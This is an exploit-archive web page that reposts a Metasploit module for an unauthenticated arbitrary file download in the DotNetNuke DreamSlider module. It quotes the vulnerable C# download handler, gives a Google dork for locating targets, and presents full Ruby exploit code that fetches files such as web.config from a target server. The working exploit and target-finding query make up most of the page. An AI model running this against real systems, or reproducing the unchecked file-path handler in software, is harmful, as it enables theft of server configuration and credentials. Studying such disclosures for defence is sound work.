首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
DotNetNuke DreamSlider 01.01.02 - Arbitrary File Download
来源:metasploit.com 作者:Charalambous 发布时间:2017-12-28  
# Exploit Title: DotNetNuke DreamSlider Arbitrary File Download
# Date: 23/01/2014
# Author: Glafkos Charalambous
# Version: 01.01.02
# Vendor: DreamSlider
# Vendor URL: http://www.dreamslider.com/
# Google Dork: inurl:/DesktopModules/DreamSlider/
# CVE:
#
# Description
# DotNetNuke DreamSlider Module prior to version X suffer from a remote unauthenticated arbitrary file download vulnerability
#
# Vulnerable Code
#
# namespace DotNetNuke.Modules.DreamSlider
# {
#    using System;
#    using System.IO;
#    using System.Web.SessionState;
#    using System.Web.UI;
#
#    public class DownloadProvider : Page, IRequiresSessionState
#    {
#        protected void Page_Load(object sender, EventArgs e)
#        {
#            if (!base.IsPostBack && (base.Request.QueryString["File"] != null))
#            {
#                string path = base.Request.QueryString["File"];
#                string fileName = Path.GetFileName(path);
#                base.Response.ContentType = "application/octet-stream";
#                base.Response.AddHeader("Content-Disposition", "attachment; filename=" + fileName);
#                base.Response.WriteFile(path);
#                base.Response.End();
#            }
#        }
#    }
# }
 
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Auxiliary
  Rank = ExcellentRanking
 
  include Msf::Auxiliary::Report
  include Msf::Exploit::Remote::HttpClient
 
  def initialize(info={})
    super(update_info(info,
      'Name'           => 'DotNetNuke DreamSlider Arbitrary File Download',
      'Description'    => %q{
        This module exploits an unauthenticated arbitrary file download vulnerability in DNN
    DreamSlider version 01.01.02 and below.
      },
      'Author'         =>
        [
          'Glafkos Charalambous', # Discovery and Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'URL', 'http://metasploit.com' ]
        ],
      'DisclosureDate' => 'Mar 23 2015'))
 
    register_options(
      [
        Opt::RPORT(80),
        OptString.new('FILENAME', [true, 'File to download', '~/web.config']),
        OptString.new('PATH', [true, 'Path of DNN Nuke', '/']),
      ], self.class)
  end
 
  def check
    begin
 
      res = send_request_cgi({
        'method' => 'GET',
        'uri' => normalize_uri(datastore['PATH'],"/DesktopModules/DreamSlider/DownloadProvider.aspx"),
        'cookie' => datastore['Cookie'],
      })
 
    if res && res.code == 200 and res.body.to_s =~ /Download Provider/
       return Exploit::CheckCode::Vulnerable
    else
       return Exploit::CheckCode::Safe
    end
    Exploit::CheckCode::Safe
   end
  end
 
  def run
    begin
      print_status("#{peer} - Downloading file #{datastore['FILENAME']}")
 
      res = send_request_cgi({
        'method' => 'GET',
        'uri' => normalize_uri(datastore['PATH'],"/DesktopModules/DreamSlider/DownloadProvider.aspx?File=") + datastore['FILENAME'],
    'cookie' => datastore['Cookie'],
      })
 
    rescue Rex::ConnectionError
      print_error("#{peer} - Could not connect.")
      return
    end
 
    if res && res.code == 200
      if res.body.to_s.bytesize == 0
        print_error("#{peer} - 0 bytes returned, file does not exist or it is empty.")
        return
      end
 
      fileName = datastore['FILENAME']
 
      path = store_loot(
        'ds.http',
        'application/octet-stream',
        datastore['RHOST'],
        res.body,
        fileName
      )
      print_good("#{peer} - File saved in: #{path}")
    else
      print_error("#{peer} - Failed to download file.")
    end
  end
end
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·SysGauge Server 3.6.18 - Denia
·ALLMediaServer 0.95 - Buffer O
·Telesquare SKT LTE Router SDT-
·Kingsoft Antivirus/Internet Se
·Sendroid < 6.5.0 - SQL Injecti
·HP Insight Control For VMware
·COMTREND ADSL Router CT-5367 -
·pfSense 2.1.3-RELEASE (amd64)
·GetGo Download Manager 5.3.0.2
·ALLMediaServer 0.95 - Buffer O
·Oracle MySQL UDF Payload Execu
·NetTransport 2.96L - Buffer Ov
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved